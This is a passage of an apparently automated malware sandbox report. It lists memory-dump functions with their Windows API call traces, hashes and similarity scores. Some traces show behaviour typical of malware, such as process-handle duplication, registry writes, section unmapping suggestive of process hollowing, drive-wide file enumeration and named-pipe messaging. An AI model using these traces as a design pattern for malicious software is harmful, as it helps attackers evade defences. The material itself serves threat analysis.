  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
